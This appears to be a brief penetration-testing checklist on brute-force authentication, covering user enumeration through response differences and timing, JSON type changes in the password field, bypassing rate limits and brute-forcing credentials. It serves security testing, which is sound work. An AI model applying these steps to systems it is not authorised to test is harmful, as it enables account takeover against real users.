AppSecNotes
Brute-Force Authentication
  1. Test for brute-force protection with a veeeerrrryyyyyyy long password with an usernames' list. Check for clues in Status Code, Content-Length, error messages (use negative search) or response times that might indicate user enumeration.
  2. For JSON schema, change the password from a string to a number, if that is applicable, and check if the error message changes for existing and non-existent accounts. Might be possible to achieve user enumeration with this.
  3. Bypass Brute-Force Protection if implemented.
  4. Brute-force for usernames and passwords or just passwords for any username found in the previous steps.